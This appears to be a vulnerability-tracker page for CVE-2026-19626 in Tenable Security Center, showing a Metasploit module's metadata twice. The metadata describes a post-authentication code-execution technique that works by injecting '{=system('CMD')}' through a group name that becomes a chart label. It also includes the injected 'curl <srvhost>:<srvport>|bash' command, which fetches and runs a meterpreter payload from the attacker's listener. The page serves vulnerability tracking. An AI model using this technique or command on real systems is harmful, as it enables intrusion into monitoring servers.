Zetlyn

Tenable Security Center Report Charting RCE

cve CVE-2026-19626 1 source, 1 claim · Watch

Metasploit exploit modules writes:
Tenable Security Center prior to 6.9.0 allows an authenticated, non-administrative user to achieve code execution as the web service account (tns) through report generation. A report definition's inline style is discarded at render (components rehydrate styles from the Style tables by styleID), so the payload is delivered through a label instead: a group created with the name `{=system('CMD')}` is accepted verbatim and becomes a pie sector label via a user/sumgroup query; `{label}` substitution runs BEFORE the eva… the claim

What each source says

PropertySourceSaidMeans here
Platform
platform
Metasploit exploit modulesLinux,Unix
receipt
Source
Metasploit exploit modules
Its words
Linux,Unix
Read by
field:platform
Said since
2026-09-28 11:44 UTC
Last answered
2026-10-02 11:59 UTC
Original
open at the source
What the source handed over
{
  "aliases": [],
  "arch": "cmd",
  "author": [
    "h00die"
  ],
  "autofilter_ports": [
    80,
    8080,
    443,
    8000,
    8888,
    8880,
    8008,
    3000,
    8443
  ],
  "autofilter_services": [
    "http",
    "https"
  ],
  "check": true,
  "default_credential": false,
  "description": "Tenable Security Center prior to 6.9.0 allows an authenticated,\n          non-administrative user to achieve code execution as the web service\n          account (tns) through report generation.\n\n          A report definition's inline style is discarded at render (components\n          rehydrate styles from the Style tables by styleID), so the payload is\n          delivered through a label instead: a group created with the name\n          `{=system('CMD')}` is accepted verbatim and becomes a pie sector\n          label via a user/sumgroup query; `{label}` substitution runs BEFORE\n          the eval loop, so the payload lands inside the format string and\n          fires at chart render. Regular org users can create both; report\n          launch refuses ROLE_ADMIN - this bug class is explicitly non-admin.\n\n          Payload constraints: the {=...} regex is non-greedy to the first\n          closing brace, so the expression may not contain one, and PHP string\n          interpolation applies; this module therefore injects only\n          `curl <srvhost>:<srvport>|bash`\n          (a bare host:port GETs / and bash reads the served script from\n          stdin). The served script itself has no such limits, which the\n          Linux Dropper target exploits with a fetch payload\n          (cmd/linux/http/...) that downloads and execs a full native payload\n          (e.g. x64 meterpreter) from the payload adapter's own listener on\n          FETCH_SRVPORT.\n\n          Report definitions are closed to administrators (creation returns\n          error 163); supply credentials for a regular org user.\n\n          Tested against SecurityCenter 6.7.2-14 on RHEL9.",
  "disclosure_date": "2026-08-13",
  "fullname": "exploit/linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
  "is_install_path": true,
  "mod_time": "2026-08-25 09:35:26 +0000",
  "name": "Tenable Security Center Report Charting RCE",
  "needs_cleanup": null,
  "notes": {
    "Reliability": [
      "repeatable-session"
    ],
    "SideEffects": [
      "artifacts-on-disk",
      "ioc-in-logs"
    ],
    "Stability": [
      "crash-safe"
    ]
  },
  "path": "/modules/exploits/linux/http/tenable_sc_report_charting_rce_cve_2026_19626.rb",
  "platform": "Linux,Unix",
  "post_auth": true,
  "rank": 600,
  "ref_name": "linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
  "references": [
    "URL-https://www.tenable.com/security/tns-2026-22",
    "CVE-2026-19626"
  ],
  "rport": 443,
  "session_types": false,
  "targets": [
    "Unix Command",
    "Linux Dropper"
  ],
  "type": "exploit"
}
—
Rank
rank
Metasploit exploit modules600
Excellent. Cannot crash the service. A memory-corruption exploit does not qualify.
receipt
Source
Metasploit exploit modules
Its words
600
Read by
field:rank
Said since
2026-09-28 11:44 UTC
Last answered
2026-10-02 11:59 UTC
Original
open at the source
What the source handed over
{
  "aliases": [],
  "arch": "cmd",
  "author": [
    "h00die"
  ],
  "autofilter_ports": [
    80,
    8080,
    443,
    8000,
    8888,
    8880,
    8008,
    3000,
    8443
  ],
  "autofilter_services": [
    "http",
    "https"
  ],
  "check": true,
  "default_credential": false,
  "description": "Tenable Security Center prior to 6.9.0 allows an authenticated,\n          non-administrative user to achieve code execution as the web service\n          account (tns) through report generation.\n\n          A report definition's inline style is discarded at render (components\n          rehydrate styles from the Style tables by styleID), so the payload is\n          delivered through a label instead: a group created with the name\n          `{=system('CMD')}` is accepted verbatim and becomes a pie sector\n          label via a user/sumgroup query; `{label}` substitution runs BEFORE\n          the eval loop, so the payload lands inside the format string and\n          fires at chart render. Regular org users can create both; report\n          launch refuses ROLE_ADMIN - this bug class is explicitly non-admin.\n\n          Payload constraints: the {=...} regex is non-greedy to the first\n          closing brace, so the expression may not contain one, and PHP string\n          interpolation applies; this module therefore injects only\n          `curl <srvhost>:<srvport>|bash`\n          (a bare host:port GETs / and bash reads the served script from\n          stdin). The served script itself has no such limits, which the\n          Linux Dropper target exploits with a fetch payload\n          (cmd/linux/http/...) that downloads and execs a full native payload\n          (e.g. x64 meterpreter) from the payload adapter's own listener on\n          FETCH_SRVPORT.\n\n          Report definitions are closed to administrators (creation returns\n          error 163); supply credentials for a regular org user.\n\n          Tested against SecurityCenter 6.7.2-14 on RHEL9.",
  "disclosure_date": "2026-08-13",
  "fullname": "exploit/linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
  "is_install_path": true,
  "mod_time": "2026-08-25 09:35:26 +0000",
  "name": "Tenable Security Center Report Charting RCE",
  "needs_cleanup": null,
  "notes": {
    "Reliability": [
      "repeatable-session"
    ],
    "SideEffects": [
      "artifacts-on-disk",
      "ioc-in-logs"
    ],
    "Stability": [
      "crash-safe"
    ]
  },
  "path": "/modules/exploits/linux/http/tenable_sc_report_charting_rce_cve_2026_19626.rb",
  "platform": "Linux,Unix",
  "post_auth": true,
  "rank": 600,
  "ref_name": "linux/http/tenable_sc_report_charting_rce_cve_2026_19626",
  "references": [
    "URL-https://www.tenable.com/security/tns-2026-22",
    "CVE-2026-19626"
  ],
  "rport": 443,
  "session_types": false,
  "targets": [
    "Unix Command",
    "Linux Dropper"
  ],
  "type": "exploit"
}
—

exploit

Tenable Security Center Report Charting RCE
zetlyn/cve-metasploit · 2026-08-13
platform Linux,Unix rank 600 source